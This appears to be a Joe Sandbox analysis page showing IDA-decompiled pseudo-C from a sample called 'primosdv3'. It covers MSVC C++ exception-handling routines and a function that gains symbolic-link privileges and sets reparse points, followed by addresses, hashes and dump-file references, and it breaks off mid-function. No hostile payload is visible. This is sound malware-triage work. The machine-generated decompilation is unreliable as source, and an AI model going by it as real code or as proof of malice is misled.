				void* _t250;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr _t253;
				signed int _t254;
				void* _t259;
				void* _t261;
				void* _t264;
				void* _t265;
				signed int _t269;
				signed char* _t270;
				intOrPtr* _t271;
				signed char _t272;
				signed int _t273;
				signed int _t274;
				intOrPtr* _t276;
				signed int _t277;
				signed int _t278;
				signed int _t283;
				signed int _t290;
				signed int _t291;
				signed int _t294;
				signed int _t296;
				signed char* _t297;
				signed int _t298;
				signed char _t299;
				signed int* _t301;
				signed char* _t304;
				signed int _t314;
				signed int _t315;
				signed int _t317;
				signed int _t327;
				void* _t329;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;

				_t296 = __edx;
				_push(_t315);
				_t301 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t275 = E00C83DAA(_a8, _a16, _t301);
				_t332 = _t331 + 0xc;
				_v12 = _t275;
				if(_t275 < 0xffffffff || _t275 >= _t301[1]) {
					L67:
					_t201 = E00C88D24(_t270, _t296, _t301, _t315);
					asm("int3");
					_t329 = _t332;
					_t333 = _t332 - 0x38;
					_push(_t270);
					_t271 = _v112;
					__eflags =  *_t271 - 0x80000003;
					if(__eflags == 0) {
						return _t201;
					} else {
						_push(_t315);
						_push(_t301);
						_t202 = E00C82AEC(_t271, _t275, _t296, _t301, _t315, __eflags);
						__eflags =  *(_t202 + 8);
						if(__eflags != 0) {
							__imp__EncodePointer(0);
							_t315 = _t202;
							_t222 = E00C82AEC(_t271, _t275, _t296, 0, _t315, __eflags);
							__eflags =  *((intOrPtr*)(_t222 + 8)) - _t315;
							if( *((intOrPtr*)(_t222 + 8)) != _t315) {
								__eflags =  *_t271 - 0xe0434f4d;
								if( *_t271 != 0xe0434f4d) {
									__eflags =  *_t271 - 0xe0434352;
									if( *_t271 != 0xe0434352) {
										_t214 = E00C80961(_t296, 0, _t315, _t271, _a4, _a8, _a12, _a16, _a24, _a28);
										_t333 = _t333 + 0x1c;
										__eflags = _t214;
										if(_t214 != 0) {
											L84:
											return _t214;
										}
									}
								}
							}
						}
						_t203 = _a16;
						_v28 = _t203;
						_v24 = 0;
						__eflags =  *(_t203 + 0xc);
						if( *(_t203 + 0xc) > 0) {
							_push(_a24);
							E00C80894(_t271, _t275, 0, _t315,  &_v44,  &_v28, _a20, _a12, _t203);
							_t298 = _v40;
							_t334 = _t333 + 0x18;
							_t214 = _v44;
							_v20 = _t214;
							_v12 = _t298;
							__eflags = _t298 - _v32;
							if(_t298 >= _v32) {
								goto L84;
							}
							_t277 = _t298 * 0x14;
							__eflags = _t277;
							_v16 = _t277;
							do {
								_t278 = 5;
								_t217 = memcpy( &_v64,  *((intOrPtr*)( *_t214 + 0x10)) + _t277, _t278 << 2);
								_t334 = _t334 + 0xc;
								__eflags = _v64 - _t217;
								if(_v64 > _t217) {
									goto L83;
								}
								__eflags = _t217 - _v60;
								if(_t217 > _v60) {
									goto L83;
								}
								_t220 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t283 = _t220[4];
								__eflags = _t283;
								if(_t283 == 0) {
									L81:
									__eflags =  *_t220 & 0x00000040;
									if(( *_t220 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E00C82DB1(_t298, _t271, _a4, _a8, _a12, _a16, _t220, 0,  &_v64, _a24, _a28);
										_t298 = _v12;
										_t334 = _t334 + 0x30;
									}
									goto L83;
								}
								__eflags =  *((char*)(_t283 + 8));
								if( *((char*)(_t283 + 8)) != 0) {
									goto L83;
								}
								goto L81;
								L83:
								_t298 = _t298 + 1;
								_t214 = _v20;
								_t277 = _v16 + 0x14;
								_v12 = _t298;
								_v16 = _t277;
								__eflags = _t298 - _v32;
							} while (_t298 < _v32);
							goto L84;
						}
						E00C88D24(_t271, _t296, 0, _t315);
						asm("int3");
						_push(_t329);
						_t297 = _v184;
						_push(_t271);
						_push(_t315);
						_push(0);
						_t205 = _t297[4];
						__eflags = _t205;
						if(_t205 == 0) {
							L109:
							_t207 = 1;
							__eflags = 1;
						} else {
							_t276 = _t205 + 8;
							__eflags =  *_t276;
							if( *_t276 == 0) {
								goto L109;
							} else {
								__eflags =  *_t297 & 0x00000080;
								_t304 = _v0;
								if(( *_t297 & 0x00000080) == 0) {
									L91:
									_t272 = _t304[4];
									_t317 = 0;
									__eflags = _t205 - _t272;
									if(_t205 == _t272) {
										L101:
										__eflags =  *_t304 & 0x00000002;
										if(( *_t304 & 0x00000002) == 0) {
											L103:
											_t208 = _a4;
											__eflags =  *_t208 & 0x00000001;
											if(( *_t208 & 0x00000001) == 0) {
												L105:
												__eflags =  *_t208 & 0x00000002;
												if(( *_t208 & 0x00000002) == 0) {
													L107:
													_t317 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t297 & 0x00000002;
													if(( *_t297 & 0x00000002) != 0) {
														goto L107;
													}
												}
											} else {
												__eflags =  *_t297 & 0x00000001;
												if(( *_t297 & 0x00000001) != 0) {
													goto L105;
												}
											}
										} else {
											__eflags =  *_t297 & 0x00000008;
											if(( *_t297 & 0x00000008) != 0) {
												goto L103;
											}
										}
										_t207 = _t317;
									} else {
										_t184 = _t272 + 8; // 0x6e
										_t209 = _t184;
										while(1) {
											_t273 =  *_t276;
											__eflags = _t273 -  *_t209;
											if(_t273 !=  *_t209) {
												break;
											}
											__eflags = _t273;
											if(_t273 == 0) {
												L97:
												_t210 = _t317;
											} else {
												_t274 =  *((intOrPtr*)(_t276 + 1));
												__eflags = _t274 -  *((intOrPtr*)(_t209 + 1));
												if(_t274 !=  *((intOrPtr*)(_t209 + 1))) {
													break;
												} else {
													_t276 = _t276 + 2;
													_t209 = _t209 + 2;
													__eflags = _t274;
													if(_t274 != 0) {
														continue;
													} else {
														goto L97;
													}
												}
											}
											L99:
											__eflags = _t210;
											if(_t210 == 0) {
												goto L101;
											} else {
												_t207 = 0;
											}
											goto L110;
										}
										asm("sbb eax, eax");
										_t210 = _t209 | 0x00000001;
										__eflags = _t210;
										goto L99;
									}
								} else {
									__eflags =  *_t304 & 0x00000010;
									if(( *_t304 & 0x00000010) != 0) {
										goto L109;
									} else {
										goto L91;
									}
								}
							}
						}
						L110:
						return _t207;
					}
				} else {
					_t270 = _a4;
					if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
						L22:
						_t296 = _a12;
						_v8 = _t296;
						goto L24;
					} else {
						_t315 = 0;
						_t342 = _t270[0x1c];
						if(_t270[0x1c] != 0) {
							goto L22;
						} else {
							_t224 = E00C82AEC(_t270, _t275, _t296, _t301, 0, _t342);
							_t343 =  *((intOrPtr*)(_t224 + 0x10));
							if( *((intOrPtr*)(_t224 + 0x10)) == 0) {
								L61:
								return _t224;
							} else {
								_t270 =  *(E00C82AEC(_t270, _t275, _t296, _t301, 0, _t343) + 0x10);
								_t259 = E00C82AEC(_t270, _t275, _t296, _t301, 0, _t343);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t259 + 0x14));
								if(_t270 == 0) {
									goto L67;
								} else {
									if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
										L16:
										_t261 = E00C82AEC(_t270, _t275, _t296, _t301, _t315, _t350);
										_t351 =  *((intOrPtr*)(_t261 + 0x1c)) - _t315;
										if( *((intOrPtr*)(_t261 + 0x1c)) == _t315) {
											L23:
											_t296 = _v8;
											_t275 = _v12;
											L24:
											_v52 = _t301;
											_v48 = 0;
											__eflags =  *_t270 - 0xe06d7363;
											if( *_t270 != 0xe06d7363) {
												L57:
												__eflags = _t301[3];
												if(__eflags <= 0) {
													goto L60;
												} else {
													__eflags = _a24;
													if(__eflags != 0) {
														goto L67;
													} else {
														_push(_a32);
														_push(_a28);
														_push(_t275);
														_push(_t301);
														_push(_a16);
														_push(_t296);
														_push(_a8);
														_push(_t270);
														L68();
														_t332 = _t332 + 0x20;
														goto L60;
													}
												}
											} else {
												__eflags = _t270[0x10] - 3;
												if(_t270[0x10] != 3) {
													goto L57;
												} else {
													__eflags = _t270[0x14] - 0x19930520;
													if(_t270[0x14] == 0x19930520) {
														L29:
														_t315 = _a32;
														__eflags = _t301[3];
														if(_t301[3] > 0) {
															_push(_a28);
															E00C80894(_t270, _t275, _t301, _t315,  &_v68,  &_v52, _t275, _a16, _t301);
															_t296 = _v64;
															_t332 = _t332 + 0x18;
															_t247 = _v68;
															_v44 = _t247;
															_v16 = _t296;
															__eflags = _t296 - _v56;
															if(_t296 < _v56) {
																_t290 = _t296 * 0x14;
																__eflags = _t290;
																_v32 = _t290;
																do {
																	_t291 = 5;
																	_t250 = memcpy( &_v104,  *((intOrPtr*)( *_t247 + 0x10)) + _t290, _t291 << 2);
																	_t332 = _t332 + 0xc;
																	__eflags = _v104 - _t250;
																	if(_v104 <= _t250) {
																		__eflags = _t250 - _v100;
																		if(_t250 <= _v100) {
																			_t294 = 0;
																			_v20 = 0;
																			__eflags = _v92;
																			if(_v92 != 0) {
																				_t299 = _t270[0x1c];
																				_t251 =  *((intOrPtr*)(_t299 + 0xc));
																				_t252 = _t251 + 4;
																				__eflags = _t252;
																				_v36 = _t252;
																				_t253 = _v88;
																				_v40 =  *_t251;
																				_v24 = _t253;
																				do {
																					asm("movsd");
																					asm("movsd");
																					asm("movsd");
																					asm("movsd");
																					_t327 = _v40;
																					_t314 = _v36;
																					__eflags = _t327;
																					if(_t327 <= 0) {
																						goto L40;
																					} else {
																						while(1) {
																							_push(_t299);
																							_push( *_t314);
																							_t254 =  &_v84;
																							_push(_t254);
																							L87();
																							_t332 = _t332 + 0xc;
																							__eflags = _t254;
																							if(_t254 != 0) {
																								break;
																							}
																							_t299 = _t270[0x1c];
																							_t327 = _t327 - 1;
																							_t314 = _t314 + 4;
																							__eflags = _t327;
																							if(_t327 > 0) {
																								continue;
																							} else {
																								_t294 = _v20;
																								_t253 = _v24;
																								goto L40;
																							}
																							goto L43;
																						}
																						_push(_a24);
																						_push(_v28);
																						E00C82DB1(_t299, _t270, _a8, _v8, _a16, _a20,  &_v84,  *_t314,  &_v104, _a28, _a32);
																						_t332 = _t332 + 0x30;
																					}
																					L43:
																					_t296 = _v16;
																					goto L44;
																					L40:
																					_t294 = _t294 + 1;
																					_t253 = _t253 + 0x10;
																					_v20 = _t294;
																					_v24 = _t253;
																					__eflags = _t294 - _v92;
																				} while (_t294 != _v92);
																				goto L43;
																			}
																		}
																	}
																	L44:
																	_t296 = _t296 + 1;
																	_t247 = _v44;
																	_t290 = _v32 + 0x14;
																	_v16 = _t296;
																	_v32 = _t290;
																	__eflags = _t296 - _v56;
																} while (_t296 < _v56);
																_t301 = _a20;
																_t315 = _a32;
															}
														}
														__eflags = _a24;
														if(__eflags != 0) {
															_push(1);
															E00C80150(_t270, _t301, _t315, __eflags);
															_t275 = _t270;
														}
														__eflags = ( *_t301 & 0x1fffffff) - 0x19930521;
														if(__eflags < 0) {
															L60:
															_t224 = E00C82AEC(_t270, _t275, _t296, _t301, _t315, __eflags);
															__eflags =  *(_t224 + 0x1c);
															if( *(_t224 + 0x1c) != 0) {
																goto L67;
															} else {
																goto L61;
															}
														} else {
															_t228 = _t301[8] >> 2;
															__eflags = _t301[7];
															if(_t301[7] != 0) {
																__eflags = _t228 & 0x00000001;
																if(__eflags == 0) {
																	_push(_t301[7]);
																	_t229 = E00C8384A(_t270, _t301, _t315, _t270);
																	_pop(_t275);
																	__eflags = _t229;
																	if(__eflags == 0) {
																		goto L64;
																	} else {
																		goto L60;
																	}
																} else {
																	goto L54;
																}
															} else {
																__eflags = _t228 & 0x00000001;
																if(__eflags == 0) {
																	goto L60;
																} else {
																	__eflags = _a28;
																	if(__eflags != 0) {
																		goto L60;
																	} else {
																		L54:
																		 *(E00C82AEC(_t270, _t275, _t296, _t301, _t315, __eflags) + 0x10) = _t270;
																		_t237 = E00C82AEC(_t270, _t275, _t296, _t301, _t315, __eflags);
																		_t286 = _v8;
																		 *((intOrPtr*)(_t237 + 0x14)) = _v8;
																		goto L62;
																	}
																}
															}
														}
													} else {
														__eflags = _t270[0x14] - 0x19930521;
														if(_t270[0x14] == 0x19930521) {
															goto L29;
														} else {
															__eflags = _t270[0x14] - 0x19930522;
															if(_t270[0x14] != 0x19930522) {
																goto L57;
															} else {
																goto L29;
															}
														}
													}
												}
											}
										} else {
											_v16 =  *((intOrPtr*)(E00C82AEC(_t270, _t275, _t296, _t301, _t315, _t351) + 0x1c));
											_t264 = E00C82AEC(_t270, _t275, _t296, _t301, _t315, _t351);
											_push(_v16);
											 *(_t264 + 0x1c) = _t315;
											_t265 = E00C8384A(_t270, _t301, _t315, _t270);
											_pop(_t286);
											if(_t265 != 0) {
												goto L23;
											} else {
												_t301 = _v16;
												_t353 =  *_t301 - _t315;
												if( *_t301 <= _t315) {
													L62:
													E00C87AF4(_t270, _t286, _t296, _t301, _t315, __eflags);
												} else {
													while(1) {
														_t286 =  *((intOrPtr*)(_t315 + _t301[1] + 4));
														if(E00C834D3( *((intOrPtr*)(_t315 + _t301[1] + 4)), _t353, 0xc9efb4) != 0) {
															goto L63;
														}
														_t315 = _t315 + 0x10;
														_t269 = _v20 + 1;
														_v20 = _t269;
														_t353 = _t269 -  *_t301;
														if(_t269 >=  *_t301) {
															goto L62;
														} else {
															continue;
														}
														goto L63;
													}
												}
												L63:
												_push(1);
												_push(_t270);
												E00C80150(_t270, _t301, _t315, __eflags);
												_t275 =  &_v64;
												E00C834BB( &_v64);
												E00C8238D( &_v64, 0xc9c284);
												L64:
												 *(E00C82AEC(_t270, _t275, _t296, _t301, _t315, __eflags) + 0x10) = _t270;
												_t231 = E00C82AEC(_t270, _t275, _t296, _t301, _t315, __eflags);
												_t275 = _v8;
												 *(_t231 + 0x14) = _v8;
												__eflags = _t315;
												if(_t315 == 0) {
													_t315 = _a8;
												}
												E00C80A87(_t275, _t315, _t270);
												E00C8374A(_a8, _a16, _t301);
												_t234 = E00C83907(_t301);
												_t332 = _t332 + 0x10;
												_push(_t234);
												E00C836C1(_t270, _t275, _t296, _t301, _t315, __eflags);
												goto L67;
											}
										}
									} else {
										_t350 = _t270[0x1c] - _t315;
										if(_t270[0x1c] == _t315) {
											goto L67;
										} else {
											goto L16;
										}
									}
								}
							}
						}
					}
				}
			}

0x00c82e31
0x00c82e38
0x00c82e3a
0x00c82e43
0x00c82e49
0x00c82e51
0x00c82e53
0x00c82e56
0x00c82e5c
0x00c831d0
0x00c831d0
0x00c831d5
0x00c831d7
0x00c831d9
0x00c831dc
0x00c831dd
0x00c831e0
0x00c831e6
0x00c83305
0x00c831ec
0x00c831ec
0x00c831ed
0x00c831ee
0x00c831f5
0x00c831f8
0x00c831fb
0x00c83201
0x00c83203
0x00c83208
0x00c8320b
0x00c8320d
0x00c83213
0x00c83215
0x00c8321b
0x00c83230
0x00c83235
0x00c83238
0x00c8323a
0x00c83301
0x00000000
0x00c83302
0x00c8323a
0x00c8321b
0x00c83213
0x00c8320b
0x00c83240
0x00c83243
0x00c83246
0x00c83249
0x00c8324c
0x00c83252
0x00c83264
0x00c83269
0x00c8326c
0x00c8326f
0x00c83272
0x00c83275
0x00c83278
0x00c8327b
0x00000000
0x00000000
0x00c83281
0x00c83281
0x00c83284
0x00c83287
0x00c83296
0x00c83297
0x00c83297
0x00c83299
0x00c8329c
0x00000000
0x00000000
0x00c8329e
0x00c832a1
0x00000000
0x00000000
0x00c832af
0x00c832b1
0x00c832b4
0x00c832b6
0x00c832be
0x00c832be
0x00c832c1
0x00c832c3
0x00c832c5
0x00c832e1
0x00c832e6
0x00c832e9
0x00c832e9
0x00000000
0x00c832c1
0x00c832b8
0x00c832bc
0x00000000
0x00000000
0x00000000
0x00c832ec
0x00c832ef
0x00c832f0
0x00c832f3
0x00c832f6
0x00c832f9
0x00c832fc
0x00c832fc
0x00000000
0x00c83287
0x00c83306
0x00c8330b
0x00c8330c
0x00c8330f
0x00c83312
0x00c83313
0x00c83314
0x00c83315
0x00c83318
0x00c8331a
0x00c83392
0x00c83394
0x00c83394
0x00c8331c
0x00c8331c
0x00c8331f
0x00c83322
0x00000000
0x00c83324
0x00c83324
0x00c83327
0x00c8332a
0x00c83331
0x00c83331
0x00c83334
0x00c83336
0x00c83338
0x00c8336a
0x00c8336a
0x00c8336d
0x00c83374
0x00c83374
0x00c83377
0x00c8337a
0x00c83381
0x00c83381
0x00c83384
0x00c8338b
0x00c8338d
0x00c8338d
0x00c83386
0x00c83386
0x00c83389
0x00000000
0x00000000
0x00c83389
0x00c8337c
0x00c8337c
0x00c8337f
0x00000000
0x00000000
0x00c8337f
0x00c8336f
0x00c8336f
0x00c83372
0x00000000
0x00000000
0x00c83372
0x00c8338e
0x00c8333a
0x00c8333a
0x00c8333a
0x00c8333d
0x00c8333d
0x00c8333f
0x00c83341
0x00000000
0x00000000
0x00c83343
0x00c83345
0x00c83359
0x00c83359
0x00c83347
0x00c83347
0x00c8334a
0x00c8334d
0x00000000
0x00c8334f
0x00c8334f
0x00c83352
0x00c83355
0x00c83357
0x00000000
0x00000000
0x00000000
0x00000000
0x00c83357
0x00c8334d
0x00c83362
0x00c83362
0x00c83364
0x00000000
0x00c83366
0x00c83366
0x00c83366
0x00000000
0x00c83364
0x00c8335d
0x00c8335f
0x00c8335f
0x00000000
0x00c8335f
0x00c8332c
0x00c8332c
0x00c8332f
0x00000000
0x00000000
0x00000000
0x00000000
0x00c8332f
0x00c8332a
0x00c83322
0x00c83395
0x00c83399
0x00c83399
0x00c82e6b
0x00c82e6b
0x00c82e74
0x00c82f71
0x00c82f71
0x00c82f74
0x00000000
0x00c82ea3
0x00c82ea3
0x00c82ea5
0x00c82ea8
0x00000000
0x00c82eae
0x00c82eae
0x00c82eb3
0x00c82eb6
0x00c8316a
0x00c8316e
0x00c82ebc
0x00c82ec1
0x00c82ec4
0x00c82ec9
0x00c82ed0
0x00c82ed5
0x00000000
0x00c82edb
0x00c82ee1
0x00c82f0d
0x00c82f0d
0x00c82f12
0x00c82f15
0x00c82f79
0x00c82f79
0x00c82f7c
0x00c82f7f
0x00c82f81
0x00c82f84
0x00c82f87
0x00c82f8d
0x00c83139
0x00c83139
0x00c8313c
0x00000000
0x00c8313e
0x00c8313e
0x00c83141
0x00000000
0x00c83147
0x00c83147
0x00c8314a
0x00c8314d
0x00c8314e
0x00c8314f
0x00c83152
0x00c83153
0x00c83156
0x00c83157
0x00c8315c
0x00000000
0x00c8315c
0x00c83141
0x00c82f93
0x00c82f93
0x00c82f97
0x00000000
0x00c82f9d
0x00c82f9d
0x00c82fa4
0x00c82fbc
0x00c82fbc
0x00c82fbf
0x00c82fc2
0x00c82fc8
0x00c82fd8
0x00c82fdd
0x00c82fe0
0x00c82fe3
0x00c82fe6
0x00c82fe9
0x00c82fec
0x00c82fef
0x00c82ff5
0x00c82ff5
0x00c82ff8
0x00c82ffb
0x00c8300a
0x00c8300b
0x00c8300b
0x00c8300d
0x00c83010
0x00c83016
0x00c83019
0x00c8301f
0x00c83021
0x00c83024
0x00c83027
0x00c8302d
0x00c83030
0x00c83035
0x00c83035
0x00c83038
0x00c8303b
0x00c8303e
0x00c83041
0x00c83044
0x00c83049
0x00c8304a
0x00c8304b
0x00c8304c
0x00c8304d
0x00c83050
0x00c83053
0x00c83055
0x00000000
0x00c83057
0x00c83057
0x00c83057
0x00c83058
0x00c8305a
0x00c8305d
0x00c8305e
0x00c83063
0x00c83066
0x00c83068
0x00000000
0x00000000
0x00c8306a
0x00c8306d
0x00c8306e
0x00c83071
0x00c83073
0x00000000
0x00c83075
0x00c83075
0x00c83078
0x00000000
0x00c83078
0x00000000
0x00c83073
0x00c8308c
0x00c83092
0x00c830af
0x00c830b4
0x00c830b4
0x00c830b7
0x00c830b7
0x00000000
0x00c8307b
0x00c8307b
0x00c8307c
0x00c8307f
0x00c83082
0x00c83085
0x00c83085
0x00000000
0x00c8308a
0x00c83027
0x00c83019
0x00c830ba
0x00c830bd
0x00c830be
0x00c830c1
0x00c830c4
0x00c830c7
0x00c830ca
0x00c830ca
0x00c830d3
0x00c830d6
0x00c830d6
0x00c82fef
0x00c830d9
0x00c830dd
0x00c830df
0x00c830e2
0x00c830e8
0x00c830e8
0x00c830f0
0x00c830f5
0x00c8315f
0x00c8315f
0x00c83164
0x00c83168
0x00000000
0x00000000
0x00000000
0x00000000
0x00c830f7
0x00c830fa
0x00c830fd
0x00c83101
0x00c8310f
0x00c83111
0x00c83128
0x00c8312c
0x00c83132
0x00c83133
0x00c83135
0x00000000
0x00c83137
0x00000000
0x00c83137
0x00000000
0x00000000
0x00000000
0x00c83103
0x00c83103
0x00c83105
0x00000000
0x00c83107
0x00c83107
0x00c8310b
0x00000000
0x00c8310d
0x00c83113
0x00c83118
0x00c8311b
0x00c83120
0x00c83123
0x00000000
0x00c83123
0x00c8310b
0x00c83105
0x00c83101
0x00c82fa6
0x00c82fa6
0x00c82fad
0x00000000
0x00c82faf
0x00c82faf
0x00c82fb6
0x00000000
0x00000000
0x00000000
0x00000000
0x00c82fb6
0x00c82fad
0x00c82fa4
0x00c82f97
0x00c82f17
0x00c82f1f
0x00c82f22
0x00c82f27
0x00c82f2b
0x00c82f2e
0x00c82f34
0x00c82f37
0x00000000
0x00c82f39
0x00c82f39
0x00c82f3c
0x00c82f3e
0x00c8316f
0x00c8316f
0x00000000
0x00c82f44
0x00c82f4c
0x00c82f57
0x00000000
0x00000000
0x00c82f60
0x00c82f63
0x00c82f64
0x00c82f67
0x00c82f69
0x00000000
0x00c82f6f
0x00000000
0x00c82f6f
0x00000000
0x00c82f69
0x00c82f44
0x00c83174
0x00c83174
0x00c83176
0x00c83177
0x00c8317e
0x00c83181
0x00c8318f
0x00c83194
0x00c83199
0x00c8319c
0x00c831a1
0x00c831a4
0x00c831a7
0x00c831a9
0x00c831ab
0x00c831ab
0x00c831b0
0x00c831bc
0x00c831c2
0x00c831c7
0x00c831ca
0x00c831cb
0x00000000
0x00c831cb
0x00c82f37
0x00c82f04
0x00c82f04
0x00c82f07
0x00000000
0x00000000
0x00000000
0x00000000
0x00c82f07
0x00c82ee1
0x00c82ed5
0x00c82eb6
0x00c82ea8
0x00c82e74

APIs

type_info::operator==.LIBVCRUNTIME ref: 00C82F50
___TypeMatch.LIBVCRUNTIME ref: 00C8305E
_UnwindNestedFrames.LIBCMT ref: 00C831B0
CallUnexpected.LIBVCRUNTIME ref: 00C831CB
_abort.LIBCMT ref: 00C831D0

Strings

csm, xrefs: 00C82EDB
csm, xrefs: 00C82F87
csm, xrefs: 00C82E6E

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: 768215b831e06710d2cd8ba5e13bc645f86216935d89f873b5496d59aadd9ccf
Instruction ID: 86c9dffc08ad6ee9cd72672f9ee8500680c59715d8ae11ec09520f6ecb1033b1
Opcode Fuzzy Hash: 768215b831e06710d2cd8ba5e13bc645f86216935d89f873b5496d59aadd9ccf
Instruction Fuzzy Hash: 4BB19B31800259EFCF29FFA4C8889AEBBB5BF04B18F14515AF8116B212D731DB51DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00C66FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00C66FA5(void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t109;
				signed int _t112;
				intOrPtr _t117;
				signed int _t134;
				long _t154;
				void* _t182;
				void* _t186;
				void* _t190;
				void* _t194;
				short _t195;
				void* _t199;
				WCHAR* _t200;
				long _t201;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int _t229;
				intOrPtr* _t233;
				intOrPtr* _t234;
				void* _t236;
				intOrPtr _t237;
				signed int _t238;
				void* _t239;
				intOrPtr _t240;
				signed int _t242;
				intOrPtr _t244;
				short _t245;
				void* _t246;
				intOrPtr _t250;
				short _t252;
				void* _t253;
				void* _t255;
				void* _t256;

				E00C7EB78(0xc9279e, _t253);
				E00C7EC50(0x30a8);
				if( *0xca1023 == 0) {
					E00C67A9C(L"SeRestorePrivilege");
					E00C67A9C(L"SeCreateSymbolicLinkPrivilege");
					 *0xca1023 = 1;
				}
				_t203 = _t253 - 0x2c;
				E00C613BA(_t203, 0x1418);
				_t244 =  *((intOrPtr*)(_t253 + 0x10));
				 *(_t253 - 4) =  *(_t253 - 4) & 0x00000000;
				E00C70602(_t253 - 0x107c, _t244 + 0x1104, 0x800);
				 *(_t253 - 0x14) = E00C83E13(_t253 - 0x107c);
				_t236 = _t253 - 0x107c;
				_t199 = _t253 - 0x207c;
				_t109 = E00C86088(_t236, L"\\??\\", 4);
				_t256 = _t255 + 0x10;
				_t204 = _t203 & 0xffffff00 | _t109 == 0x00000000;
				 *(_t253 - 0xd) = _t204;
				if(_t109 == 0) {
					_t236 = _t253 - 0x1074;
				}
				if(_t204 != 0) {
					_t194 = E00C86088(_t236, L"UNC\\", 4);
					_t256 = _t256 + 0xc;
					if(_t194 == 0) {
						_t195 = 0x5c;
						 *((short*)(_t253 - 0x207c)) = _t195;
						_t199 = _t253 - 0x207a;
						_t236 = _t236 + 6;
					}
				}
				E00C86066(_t199, _t236);
				_t112 = E00C83E13(_t253 - 0x207c);
				_t237 =  *((intOrPtr*)(_t253 + 8));
				_t200 =  *(_t253 + 0xc);
				 *(_t253 - 0x18) = _t112;
				if( *((char*)(_t237 + 0x7197)) != 0) {
					L12:
					E00C6A0B1(_t200, _t204, _t237, _t253, _t200, 1,  *(_t237 + 0x714b) & 0x000000ff);
					if(E00C6A231(_t200) != 0) {
						_t186 = E00C6A28F(E00C6A243(_t200));
						_push(_t200);
						if(_t186 == 0) {
							E00C6A1E0();
						} else {
							E00C6A18F();
						}
					}
					if( *((char*)(_t244 + 0x10f1)) != 0 ||  *((char*)(_t244 + 0x2104)) != 0) {
						__eflags = CreateDirectoryW(_t200, 0);
						if(__eflags != 0) {
							goto L21;
						}
						_t201 = 0;
						E00C62021(__eflags, 0x14, 0, _t200);
						E00C66D83(0xca1098, 9);
						goto L42;
					} else {
						_t182 = CreateFileW(_t200, 0x40000000, 0, 0, 1, 0x80, 0);
						if(_t182 != 0xffffffff) {
							CloseHandle(_t182);
							L21:
							_t117 =  *((intOrPtr*)(_t244 + 0x1100));
							__eflags = _t117 - 3;
							if(_t117 != 3) {
								__eflags = _t117 - 2;
								if(_t117 == 2) {
									L27:
									_t233 =  *(_t253 - 0x2c);
									_t205 =  *(_t253 - 0x14) & 0x0000ffff;
									_t238 =  *(_t253 - 0x18) & 0x0000ffff;
									 *_t233 = 0xa000000c;
									_t245 = _t205 + _t205;
									 *((short*)(_t233 + 0xa)) = _t245;
									 *((short*)(_t233 + 4)) = 0x10 + (_t238 + _t205) * 2;
									 *((intOrPtr*)(_t233 + 6)) = 0;
									E00C86066(_t233 + 0x14, _t253 - 0x107c);
									_t246 =  *(_t253 - 0x2c);
									 *((short*)(_t246 + 0xc)) = _t245 + 2;
									 *((short*)(_t246 + 0xe)) = _t238 + _t238;
									E00C86066(_t246 + ( *(_t253 - 0x14) + 0xb) * 2, _t253 - 0x207c);
									_t134 =  *(_t253 - 0xd) & 0x000000ff ^ 0x00000001;
									__eflags = _t134;
									 *(_t246 + 0x10) = _t134;
									L28:
									_t239 = CreateFileW(_t200, 0xc0000000, 0, 0, 3, 0x2200000, 0);
									__eflags = _t239 - 0xffffffff;
									if(_t239 != 0xffffffff) {
										__eflags = DeviceIoControl(_t239, 0x900a4, _t246, ( *(_t246 + 4) & 0x0000ffff) + 8, 0, 0, _t253 - 0x30, 0);
										if(__eflags != 0) {
											E00C69556(_t253 - 0x30b4);
											 *(_t253 - 4) = 1;
											E00C67A7B(_t253 - 0x30b4, _t239);
											_t240 =  *((intOrPtr*)(_t253 + 8));
											_t247 =  *((intOrPtr*)(_t253 + 0x10));
											asm("sbb ecx, ecx");
											asm("sbb ecx, ecx");
											asm("sbb ecx, ecx");
											E00C69DA2(_t253 - 0x30b4,  *((intOrPtr*)(_t253 + 0x10)),  ~( *(_t240 + 0x82d0)) &  *((intOrPtr*)(_t253 + 0x10)) + 0x00001040,  ~( *(_t240 + 0x82d4)) & _t247 + 0x00001048,  ~( *(_t240 + 0x82d8)) & _t247 + 0x00001050);
											E00C69620(_t253 - 0x30b4);
											__eflags =  *((char*)(_t240 + 0x71a8));
											if( *((char*)(_t240 + 0x71a8)) == 0) {
												E00C6A4ED(_t200,  *((intOrPtr*)(_t247 + 0x24)));
											}
											_t201 = 1;
											E00C6959A(_t253 - 0x30b4);
											goto L42;
										}
										CloseHandle(_t239);
										E00C62021(__eflags, 0x15, 0, _t200);
										_t154 = GetLastError();
